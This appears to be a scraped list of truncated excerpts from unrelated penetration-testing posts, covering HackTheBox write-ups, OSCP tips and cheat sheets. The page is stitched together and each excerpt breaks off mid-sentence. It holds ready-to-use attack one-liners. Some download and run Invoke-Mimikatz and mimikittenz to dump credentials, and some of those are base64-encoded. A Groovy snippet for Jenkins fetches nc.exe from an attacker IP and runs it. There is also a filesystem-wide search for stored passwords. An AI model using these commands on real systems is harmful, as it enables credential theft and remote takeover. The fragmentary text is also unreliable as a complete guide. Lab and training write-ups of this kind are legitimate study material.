HackTheBox – Granny

This writeup details attacking the machine Granny (10.10.10.15) on HackTheBox. I will write this piece describing as many elements of the process as possible, assuming the reader to be just starting out in the field. Further writeups aren’t going to go into as much detail but if you’re brand new to a lot of these tools, […]

HackTheBox – Chatterbox

HackTheBox – Chatterbox Writeup Posted on June 16, 2018 Enumeration Chatterbox is a pretty simple box and reminds me a lot of something you run across in the OSCP labs. Overall it’s pretty easy, the only sort of tricky part is with privesc if you aren’t familiar with port forwarding. If you follow my Windows […]

Quick-Mimikatz

*NOTE – These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!* #mimikatz IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1’); $m = Invoke-Mimikatz -DumpCreds; $m #encoded-mimikatz powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0ARAB1AG0AcABDAHIAZQBkAHMAOwAgACQAbQAKAA== #mimikittenz IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1’); Invoke-mimikittenz #encoded-mimikittenz powershell -enc SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcHV0dGVycGFuZGEvbWltaWtpdHRlbnovbWFzdGVyL0ludm9rZS1taW1pa2l0dGVuei5wczEnKTsgSW52b2tlLW1pbWlraXR0ZW56Cg== #puck powershell IEX […]

HackTheBox – Jeeves

posted inCTF Challenges on May 21, 2018 by Raj Chandel SHARE Hello Friends!! Today we are going to solve another CTF Challenge “Jeeves”. This VM is also developed by Hack the Box, Jeeves is a Retired Lab and there are multiple ways to breach into this VM. In this lab, we have escalated root privilege […]

Pure Groovy/Java Reverse Shell

There were so many options but we were interested in Script Console because Jenkins has very nice Groovy script console that allows someone to execute arbitrary Groovy scripts within the Jenkins master runtime. https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76 def cmd = “cmd.exe /c dir”.execute(); println(“${cmd.text}”); def process = “powershell -command Invoke-WebRequest ‘http://10.10.14.28/nc.exe’ -OutFile nc.exe”.execute(); println(“${process.text}”); def process = “powershell -command ./nc.exe […]

Reverse Shells met een USB Rubber Ducky

In dit artikel wordt het opzetten van een Reverse Shell payload op een USB Rubber Ducky besproken.  Een omgekeerde shell is een shell type, waarbij de geinfecteerde computer ‘inbelt’ naar de computer van een aanvaller. Hierbij luistert de aanvallende computer meestal op een specifieke poort. Wanneer de verbinding tot stand komt, is de aanvallende computer in staat om commando’s […]

Practical hacking tips and tricks

Hakluke’s Ultimate OSCP Guide: Part 3 — Practical hacking tips and tricks Luke Stephens (@hakluke) Mar 31 <img class=“progressiveMedia-noscript js-progressiveMedia-inner” src=” https://cdn-images-1.medium.com/max/1600/1*9tIaYrrJSKBKR-LnoGzBgQ.png“> Man walks through door with large shadow. OFFENSIVE security logo dramatically appears in a red abyss.So, you’ve finally signed up, paid the money, waited for the start date, logged in to the VPN, and are suddenly hit in the face […]

Other tricks

Post Exploit Enumeration Search Database passwords in files 1 2 3 4 grep -rnw ‘/’ -ie ‘pass’ –color=always grep -rnw ‘/’ -ie ‘DB_PASS’ –color=always grep -rnw ‘/’ -ie ‘DB_PASSWORD’ –color=always grep -rnw ‘/’ -ie ‘DB_USER’ –color=always File Upload on linux systems via base64 encoding Converting a file to base64: 1 cat file2upload | base64 Once the file is converted to base64, you can just create a new file on the remote system and copy the base64 output of […]

Penetration Testing Tools Cheat Sheet

Penetration Testing Tools Cheat Sheet ∞ CHEAT-SHEET 17 Feb 2017  Arr0way Introduction Penetration testing tools cheat sheet, a quick reference high level overview for typical penetration testing engagements. Designed as a quick reference cheat sheet providing a high level overview of the typicalcommands you would run when performing a penetration test. For more in depth information I’d recommend the man […]